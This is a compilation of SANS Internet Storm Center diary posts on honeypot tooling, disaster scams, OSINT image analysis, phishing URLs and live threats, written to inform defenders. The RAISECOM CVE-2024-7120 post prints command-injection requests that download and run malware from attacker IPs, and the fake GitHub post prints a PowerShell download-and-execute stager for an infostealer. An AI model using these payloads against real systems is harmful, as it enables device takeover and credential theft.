Kickstart Your DShield Honeypot [Guest Diary], (Thu, Oct 3rd)

This post was originally published on this site

[This is a Guest Diary by Joshua Gilman, an ISC intern as part of the SANS.edu BACS program]

Introduction

Setting up a DShield honeypot is just the beginning. The real challenge lies in configuring all the necessary post-installation settings, which can be tedious when deploying multiple honeypots. Drawing from personal experience and valuable feedback from past interns at the Internet Storm Center (ISC), I developed DShieldKickStarter to automate this often repetitive and time-consuming process.

What is DShieldKickStarter?

DShieldKickStarter is not a honeypot deployment tool. Instead, it’s a post-installation configuration script designed to streamline the setup of a honeypot environment after the DShield honeypot software has been installed. The script ensures that honeypots run efficiently with minimal manual effort by automating essential tasks such as setting up log backups, PCAP capture, and installing optional analysis tools.

Key Features of DShieldKickStarter

•    Automated Log Backups: The script organizes, compresses, and password-protects honeypot logs to prevent accidental execution of malicious files.
•    PCAP Capture Setup: Using tcpdump, it captures network traffic while excluding specific ports, ensuring relevant data is logged.
•    Optional Tool Installation: Cowrieprocessor and JSON-Log-Country are included as optional tools. Both were invaluable during my internship for streamlining data analysis.
•    Helpful for Multiple Honeypots: This script is handy when managing several honeypots. It saves time by automating repetitive setup tasks.

Step-by-Step Breakdown

The script automates several critical tasks:
1.    Creating Directories and Setting Permissions 
            Ensures the necessary directory structures for logs, backups, and PCAP data are in place, with proper permissions to secure sensitive files.
2.    Installing Required Packages 
             Installs essential tools such as tcpdump, git, and python3-pip, streamlining the log and packet capture setup.
3.    Configuring Log Rotation and Backups 
             Automatically rotates logs and stores them with password protection. PCAP files and honeypot logs are archived daily, and older backups are cleaned to save space.
4.    Automating PCAP Capture 
             Sets up tcpdump to capture network traffic, excluding predefined ports to ensure relevant data capture. The process is automated via cron jobs.
5.    Optional Tool Integration 
             The script optionally installs cowrieprocessor and JSON-Log-Country, two tools that were extremely helpful during my internship. These streamline log processing and help categorize attack data for further analysis.
6.    SCP Option for Off-Sensor Backup 
             If enabled, the script supports SCP transfers to a remote server, automating the secure transfer of backups for off-sensor storage.

Who Benefits from This?

•    ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection.
•    Cybersecurity Professionals: This tool's time-saving features can benefit anyone interested in setting up a DShield honeypot and contributing to threat intelligence efforts.

Tool Showcase

1. CowrieProcessor

Description

CowrieProcessor is a Python tool designed to process and summarize Cowrie logs, allowing for more accessible and detailed analysis. Cowrie logs can contain overwhelming data as they track every interaction with the honeypot. CowrieProcessor condenses this data into a readable format, focusing on crucial elements like session details, IP addresses, commands entered by attackers, and malicious files downloaded during the session.

Usage and Benefits

The tool automates the parsing of Cowrie logs, providing a summary that includes key metrics such as session duration, attacker IPs, and the commands used during each attack. This is useful for quickly understanding attacker behavior without sifting through massive raw log files. With this, security teams can focus on actionable insights, such as blocking specific IPs or analyzing downloaded malware.
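To illustrate the raw material CowrieProcessor summarizes, here is a toy example. The field names (eventid, src_ip, input) mirror Cowrie's JSON log format, but the log lines, IP, and commands below are fabricated, and CowrieProcessor itself does far more than this:

```shell
# Toy example: pull attacker commands out of a Cowrie-style JSON log with
# basic shell tools, to show the structure CowrieProcessor condenses.
cat > /tmp/cowrie-sample.json <<'EOF'
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","input":"cat /etc/passwd"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.7","duration":12.3}
EOF

# Keep only command-input events and extract the attacker-typed command.
grep '"cowrie.command.input"' /tmp/cowrie-sample.json \
    | sed -E 's/.*"input":"([^"]*)".*/\1/'
```

Even this crude filter shows why a summarizer helps: a busy honeypot produces thousands of such events per day.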

Screenshot Explanation

In the attached screenshot, CowrieProcessor provides a detailed view of a session from an attack on the honeypot. It shows session details, commands attempted by the attacker, and files downloaded, such as the malicious authorized_keys file. The easy-to-read output from CowrieProcessor highlights the attack flow, giving you insight into the malicious actor’s intentions.


CowrieProcessor output showing session details and malicious activities detected by the honeypot.

DShield SIEM (ELK)

Description

While DShield SIEM (ELK) is not included in the script, it plays a crucial role in further analysis and data visualization for honeypots. ELK (Elastic Stack) enables the collection, processing, and real-time visualization of honeypot data. It provides a centralized platform to track attacker behavior, detect patterns, and generate insights through interactive dashboards.

Usage and Benefits

Using ELK, you can monitor key metrics such as the most frequent attacker IPs, session types, and the commands attackers use. ELK dashboards also provide the ability to create custom queries using Kibana Query Language (KQL), which allows you to filter logs by specific attributes like failed logins, session durations, or malicious file downloads.


ELK dashboard showing attack data, top IP addresses, session activity, and trends over time.

Screenshot Explanation

The attached screenshot shows a detailed ELK dashboard summarizing honeypot data. On the left side, the "Top 50 IP" table displays the most active attacking IPs, while the center pie charts break down the types of logs (honeypot, webhoneypot, etc.) and session activity. The bar chart on the right visualizes Cowrie activity over time, helping analysts track attack patterns. KQL can filter this data even further, focusing on specific attacks or malicious behaviors.

KQL (Kibana Query Language)

One of the standout features of ELK is the ability to leverage KQL for deep-dive investigations. For instance, if you want to search for all failed login attempts, you can use a KQL query like:
event.outcome: "login.failed"

This query will instantly filter your logs, allowing you to pinpoint where and when login attempts failed. Another useful query might be filtering by source IP to track all actions from a particular attacker:
source.ip: "45.148.10.242"

With KQL, you can quickly analyze data across large volumes of logs, making it easy to detect anomalies, potential threats, or patterns in attacker behavior.

[1] https://github.com/DShield-ISC/dshield
[2] https://github.com/iamjoshgilman/DShieldKickStarter
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://github.com/justin-leibach/JSON-Log-Country
[5] https://github.com/bruneaug/DShield-SIEM
[6] https://www.elastic.co/guide/en/kibana/current/kuery-query.html
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security related Docker containers, (Wed, Oct 2nd)

Over the last 9 months or so, I've been putting together some docker containers that I find useful in my day-to-day malware analysis and forensicating. I have been putting them up on hub.docker.com and decided I might as well let others know they were there. In a couple of cases, I just found it easier to create a docker container than to try to remember to switch in and out of a Python virtualenv. In a couple of other cases, it avoids issues I've had with conflicting versions of installed packages. In every case, I'm tracking new releases so I can update my containers when new releases come out, and I usually do so within a couple of days of the new release. The ones that I have up at the moment are the following:

Hurricane Helene Aftermath – Cyber Security Awareness Month, (Tue, Oct 1st)

For a few years now, October has been "National Cyber Security Awareness Month". This year, it is a good opportunity for a refresher on some scams that tend to happen around disasters like Hurricane Helene. The bigger the disaster, the more attractive it is to scammers.

Fake Donation Sites

Hurricane Katrina was the first event that triggered many fake donation websites. Since then, the number of fake donation websites has decreased somewhat, partly due to law enforcement attention and hopefully due to people becoming more aware of these scams. These scams either pretend to be a new charity/group attempting to help or impersonate an existing reputable charity. People in affected areas need help. Please only donate to groups you are familiar with and who were active before the event.

AI Social Media Posts

I believe these posts are mostly created to gain social media followers, perhaps with the intent of later reeling them into some scam. They often post dramatic images created with AI tools or copied from legitimate accounts. Some may simply be interested in the monetization schemes social media and video sites participate in. Do not amplify these accounts. Strictly speaking, they are not "fake news," but legitimate news sources, who go out to take pictures and gather information, need exposure more than these fake accounts. Often, the fake accounts exaggerate the impact of the event and, in some cases, reduce the credibility of legitimate recovery efforts.

Malware

Attackers may use the event as a pretense to trick victims into opening attachments. In the past, we have seen e-mails and websites that spread malware claiming to include videos or images of the event. These attachments turn out to be executables installing malware.

Fake Assistance Scams

In the aftermath of a disaster, organizations often provide financial aid through loans. Scammers will apply for these loans using stolen identities traded online. It may take several months for the victim to become aware of this, often when they face a request to repay the loan. Sadly, there is not much, if anything, you can do to protect yourself from these scams. The intent of the assistance is to be quick and unbureaucratic and to "sort things out later". You may have to prove that someone else used your information to apply for the loan.

"Grandparent Scam"

In this scam, a caller will pretend to be a relative or close friend, asking for money. These scams have improved because they can often identify individuals in the disaster area and use them as a pretense to extort money. The caller may claim to be the individual (often they use SMS or other text messaging services), or they may claim to represent a police department or a hospital. Do not respond to any demands for money. Notify your local police department. If you are concerned, try to reach out to the agency calling you using a published number (note that Google listings can be fake). Due to the conditions in affected areas, the local authorities may be unable to respond. Your local law enforcement agency may be able to assist. They often have a published "non-emergency" number you can use instead of 911. Individuals in the affected area may not be reachable due to spotty power and cell service availability.

Final Word

Please let us know if we missed anything. A final word on some disaster preparedness items with an "IT flavor":

Broken high voltage power line wire touching cable TV and phone lines.

  1. Have a plan to get out, and if you can get out: get out. You should not stay in the affected area unless you are part of the recovery effort.
  2. Cellular networks fail. Cellular networks tend to work pretty well during smaller disasters, but they need power, towers, and other infrastructure, which will fail in large-scale disasters. Satellite connectivity quickly becomes your only viable option (if you have power). If you have a phone with satellite emergency calling (for example, a recent iPhone), it offers a "demo mode" to familiarize you with the feature.
  3. If you are lucky to already have a Starlink setup, bring the antenna inside before the storm and disconnect the equipment from power to avoid spikes destroying it.
  4. Disconnect as many electric devices from outlets as possible during a power outage (or before power outages are expected). Power outages often come with power spikes and other irregular power events that can destroy sensitive electronics. Do not plug them back in until power is restored and stable.
  5. Even a downed phone or cable TV line can be energized. You may not see the high voltage line that is also down and touches the cable TV line. I took the picture on the right this weekend in my neighborhood of a high-voltage line touching the cable TV and phone line.

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

Tool update: mac-robber.py and le-hex-to-ip.py, (Mon, Sep 30th)

One of the problems I've had since I originally wrote mac-robber.py [1][2][3] seven years ago is that, because of the underlying os.stat Python library, we couldn't get file creation times (B-times). Since the release of GNU coreutils 8.32 (or so), the statx() call has been available on Linux to provide the B-time, but Python out of the box doesn't yet support that call. Recently, though, I did some searches and discovered that for several years there has actually been a pip package called pystatx that exposes the statx() call and allows us to get the B-time. So, I updated the script. It now tries to import statx, and if it succeeds (probably only on relatively recent Linux distros where the pip package has been installed), it can now provide B-times. I also adjusted the formatting so the script will now give microsecond instead of millisecond resolution. I will probably write a Python version of mactime at some point so that we can actually take advantage of the additional resolution.
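If you want to check whether your own system exposes B-times at all, recent GNU coreutils stat can report the birth time directly via its %w format (it prints "-" when the filesystem or kernel does not provide one):

```shell
# Check whether this filesystem/kernel combination exposes a birth time.
# stat's %w format prints the B-time, or "-" when it is unavailable.
touch /tmp/btime-demo
stat --format='B-time: %w' /tmp/btime-demo
```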

OSINT – Image Analysis or More Where, When, and Metadata [Guest Diary], (Wed, Sep 25th)

[This is a Guest Diary by Thomas Spangler, an ISC intern as part of the SANS.edu BACS program]

A picture is worth a thousand words, as the saying goes. Open-source information and basic image analysis can be valuable tools for investigators. The purpose of this blog is to demonstrate the power of image analysis and the associated tools for open-source intelligence (OSINT). Having recently completed SANS SEC497, I was inspired to share the power of image analysis in providing valuable information for investigations. This post will provide a step-by-step approach using a random image [1] pulled from the internet.

SAFETY FIRST

Always scan a file or URL prior to retrieving a target image. This action is particularly useful when retrieving information from suspicious or unknown websites. A tool like VirusTotal [2] makes this step very easy.

First, select your scan type:  File, URL, or Search.  In the case of a file, it can be dragged and dropped on the screen.

In this case, I used a known PDF file to generate the sample result shown below.

Now we are clear to proceed with the image analysis…

TARGET IMAGE

Our target image was randomly selected from the NY Times website.

Credit: Filip Singer, EPA

WHERE WAS THIS IMAGE TAKEN

A natural first question might be:  where was this image taken?  OSINT analysts use many tools, including image analysis, to answer questions like this one.  As you will see, image analysis alone cannot answer this question.  Other tools like Google searches, translation tools, and metadata can be combined with image analysis to provide discrete clues that integrate into an answer.

Potentially identifiable or unique markings…

In looking for image clues, focus on context (e.g. bridge collapse and flooding), unique markers (e.g. signs, buildings, bridges), and geography.

With these clues in hand, we can now use tools like Google Lens [3] and Yandex [4] (if your organization or agency permits its use because of the Russian origin) for reverse image lookups and text-based searches.  While most people think of Google searches in terms of text, Google Lens is the image search equivalent, which can be used to find additional clues.  In this case, I used Google Lens with the original image and the image clues mentioned above to find relevant matches.  Below are the Google Lens matches obtained from a search on the original image:

From the Google Lens results, the images from www.lusa.pt  and TAG24 seem to be similar matches.  Note the TAG24 description indicated Dresden and is written in German.  Upon visiting the TAG24 website [5], we find a different image of the same location and an article in German.  

Using another important OSINT tool, Google Translate, we can translate some of the text to English in order to find the exact bridge and location in question.

Voila…Carola Bridge.  A simple Google text search on Carola Bridge turns up an article from Euronews [6] that confirms the image location at the Carola Bridge in Dresden, Germany.  We can also use a Google Dork…maps:carola bridge…to find a map of the location:

WHEN

From the Euronews article, we also know that the bridge collapsed sometime between 11-12 September 2024 in the middle of the night.

An AP article [7] that also turned up in the previous Google search indicated that “crews were alerted around 3am”. And an Engineering News Record article [8] confirms the collapse occurred on 11 September 2024. A Deutsche Welle article [9] confirms that demolition of the fallen structure began on 13 September 2024.

We can conclude that this picture was taken sometime between 3am local time on 11 Sept 2024 and daylight hours on 13 Sept 2024.  With further investigation, using Google Street View and similar tools, we could have probably narrowed the timeline down even further.

METADATA

I wanted to touch on one other important topic…metadata.  Metadata (as shown in the details below from the reference image) presents interesting information such as location, size, imaging device, date, and time for the image in question.  Original images, videos, and files usually contain a treasure chest of information in the form of metadata.  Using Exiftool [10], the following data is returned on the target file in this blog:

It includes some basic information about the image size, encoding process, etc., but with original images, location, camera type, date, and time will all likely be included.  These pieces of metadata could drastically speed up any OSINT investigation.

CONCLUSION

In conclusion, imagery can be an important starting point for OSINT investigations.  However, more cyber tools than just image analysis must be employed to answer some basic questions like who, where, and when.  In certain cases, an analyst needs to pay close attention to their own attribution (“being found”) when conducting an investigation.  Instead of using live web searches from a local machine, an analyst may need to use sock puppet accounts, VPN protection, and/or cloud-based hosts and even tools like Google Cache and the Wayback Machine for archived web sites to protect their identities and the fact that a target is being investigated.

Thank you to SEC497 instructor Matt Edmondson for piquing my interest in OSINT and the skills developed during the course.

[1] nytimes.com
[2] virustotal.com
[3] https://chromewebstore.google.com/detail/download-google-lens-for/miijkofiplfeonkfmdlolnojlobmpman?hl=en
[4] Yandex.com/images
[5] https://www.tag24.de/thema/naturkatastrophen/hochwasser/hochwasser-dresden/hochwasser-in-dresden-pegel-prognosen-werden-sich-bestaetigen-3317729#google_vignette
[6] https://www.euronews.com/my-europe/2024/09/12/major-bridge-partially-collapses-into-river-in-dresden
[7] https://apnews.com/article/dresden-germany-bridge-collapse-carola-bridge-ad1ebf71f396d8984d2e79f9e6ba3f06
[8] https://www.enr.com/articles/59283-dramatic-bridge-failure-surprises-dresden-germany-officials
[9] https://www.dw.com/en/dresden-rushes-to-remove-collapsed-bridge-amid-flood-warning/a-70215802
[10] https://exiftool.org/
[11] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Exploitation of RAISECOM Gateway Devices Vulnerability CVE-2024-7120, (Tue, Sep 24th)

Image: Raisecom SOHO/Enterprise Gateway, MSG2200 and MSG2100E series.

Late in July, a researcher using the alias "NETSECFISH" published a blog post revealing a vulnerability in RAISECOM gateway devices [1]. The vulnerability affects the "vpn/list_base_Config.php" endpoint and allows for unauthenticated remote code execution. According to Shodan, about 25,000 vulnerable devices are exposed to the internet.

With a simple proof of concept available, it is no surprise that we are seeing the vulnerability exploited. The first exploits were detected by our sensors on September 1st.

The graph above shows the number of attacks for this vulnerability we saw daily.

There are two distinct payloads that we have seen used so far:

 /vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20rm%20-rf%20tplink%3B%20curl%20http%3A//[redacted]/tplink%20--output%20tplink%3B%20chmod%20777%20tplink%3B%20./tplink%20raisecom%60

This decoded to the following script:

cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

The second URL looks quite similar:

/vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20tftp%20-g%20-r%20ppc%20141.98.11.136%2069%3B%20chmod%20777%20ppc%3B%20./ppc%20raisee%60

Decoding to:

cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

Interestingly, the second attempt uses TFTP, not HTTP, to download the malware. Sadly, neither file was available at the time I am writing this. But based on the naming of the files, it is fair to assume that this is one of the regular botnets hunting for vulnerable routers.

I was not able to find details about this vulnerability or patches on RAISECOM's website [2].

[1] https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707
[2] https://en.raisecom.com/product/sohoenterprise-gateway


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Phishing links with @ sign and the need for effective security awareness building, (Mon, Sep 23rd)

While going over a batch of phishing e-mails that were delivered to us here at the Internet Storm Center during the first half of September, I noticed one message which was somewhat unusual. Not because it was untypically sophisticated or because it used some completely new technique, but rather because its authors took advantage of one of the less commonly misused aspects of the URI format – the ability to specify information about a user in the URI before its "host" part (domain or IP address).

RFC 3986 specifies[1] that a “user information” string (i.e., username and – potentially – other contextual data) may be included in a URI in the following format:

[ userinfo "@" ] host [ ":" port ]

In this instance, the threat actors used the user information string to make the link appear as if it was pointing to facebook.com, while it actually led to an IPFS gateway[2] ipfs.io.

As you can see in the previous image, the full target for the link was:

hxxps[:]//facebook.com+login%3Dsecure+settings%3Dprivate@ipfs[.]io/ipfs/bafybeie2aelf7bfz53x7bquqxa4r3x2zbjplhmaect2pwxiyws6rlegzte/sept.html#[e-mail_address_of_recipient]

This approach is not new – threat actors have been misusing the user information string for a long time, sometimes more intensively, sometimes less so[3] – nevertheless, it is something that can be quite effective if recipients aren’t careful about the links they click.

This specific technique is also only seldom mentioned in security awareness courses, and since I was recently asked by a customer to add it to one such course, I thought that the concept of effective security awareness building in relation to phishing deserved some small discussion.

The truth is that even if this technique is not covered in a security awareness course, this – by itself – doesn’t necessarily mean that such a course is useless. In fact, to my mind, it might be more effective than a course which includes it. Bear with me here…

It is undeniable that less can sometimes mean more when it comes to security awareness building. During an initial/on-boarding security training or a periodic security awareness training, we only have a limited time to teach non-specialists about a very complex field. This means that we need to cover the topic in as effective a manner as possible. And, when it comes to phishing, I don’t think that anyone would disagree that there are many more techniques than one can reasonably cover in the context of a one- or two-hour course (in fact, covering just a few of them is enough for a technical webinar[4]). So, this is one area where we probably shouldn’t try to “catch them all”. Rather, we should try to focus on those aspects of phishing that are common to most techniques, since these can help people to identify that something is wrong regardless of the specific approach the attacker might have taken. Which brings us back to the use of the “at” sign and the ability of threat actors to prepend an arbitrary user information string ahead of the host part of the URI.

Since this isn’t (by far) the only technique that depends on users looking only at the beginning of a link (think of a threat actor using a well-chosen fifth or sixth level domain, such as “https://isc.sans.edu.untrustednetwork.net/random”, to make it appear as if the link goes to isc.sans.edu), it might make more sense not to cover the “at” sign technique specifically in a security awareness course. Instead, we can teach people how to find the domain part of any link by looking for the first standalone slash (not counting the two in http(s)://), and how to read the domain right to left to make sure it is trustworthy, since this would cover any phishing technique where the link points to an untrustworthy domain.
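The "first standalone slash, then last at sign" reading rule can even be expressed mechanically. A small illustrative shell snippet, using an example domain in place of the real IPFS gateway:

```shell
# Illustration of the parsing rule: strip the scheme, cut the URL at the
# first standalone slash, keep only what follows the last "@", and drop
# any ":port" suffix. What remains is the host the browser will contact.
url='https://facebook.com+login%3Dsecure+settings%3Dprivate@ipfs.example/ipfs/sept.html'
host=$(printf '%s\n' "$url" \
    | sed -E 's#^[a-zA-Z][a-zA-Z0-9+.-]*://##; s#/.*##; s#.*@##; s#:.*##')
echo "$host"   # prints: ipfs.example
```

Everything before the "@" is just the (attacker-controlled) user information string; the browser ignores it when deciding where to connect.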

This doesn’t mean that one can’t or shouldn’t mention the details of how threat actors can misuse user information strings in URLs in, for example, a security awareness newsletter; however, it probably isn’t something that we should devote time and space to during a 60- or 90-minute initial or periodic security awareness course for all employees of an organization.

[1] https://datatracker.ietf.org/doc/html/rfc3986#section-3.2
[2] https://isc.sans.edu/diary/30744
[3] https://www.malwarebytes.com/blog/news/2022/05/long-lost-symbol-gets-new-life-obscuring-malicious-urls
[4] https://www.youtube.com/watch?v=Fb2Z3bw-oJ8

———–
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting

Fake GitHub Site Targeting Developers, (Thu, Sep 19th)

Our reader "RoseSecurity" forwarded the following malicious email they received:

Hey there!

We have detected a security vulnerability in your repository. Please contact us at https:[//]github-scanner[.]com  to get more information on how to fix this issue.

Best regards,
Github Security Team

GitHub has offered free security scans to users for a while now. But usually, you go directly to GitHub.com to review results, not to a "scanner" site like the one suggested above.

The github-scanner website first displays what appears to be some form of Captcha to make sure you are "Human" (does this exclude developers?).

Clicking on "I'm not a robot" leads to this challenge screen:

Not your normal Captcha! So what is going on?

JavaScript on the website copied an exploit string into the user's clipboard. The "Windows"+R sequence opens the Windows run dialog, and the victim is enticed to execute the code. The script:

powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "? ''I am not a robot - reCAPTCHA Verification ID: 93752"

This simple and effective script will download and execute the "download.txt" script. The victim will likely never see the script. Due to the size of the run dialog, the victim will only see the last part of the string above, which may appear perfectly reasonable given that the victim is supposed to prove that they are human.

download.txt contains:

$webClient = New-Object System.Net.WebClient
$url1 = "https://github-scanner[.]com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath "$env:TEMP\SysSetup.exe"

This will download "l6E.exe" and save it as "SysSetup.exe". Luckily, l6E.exe has pretty good anti-virus coverage. On my test system, Microsoft Defender immediately recognized it [1]. It is identified as "Lumma Stealer", an information stealer. The domain is recognized by some anti-malware vendors, but sadly not yet included on Google's Safe Browsing blocklist.

Yet another case of infostealers going after developers!

[1] https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu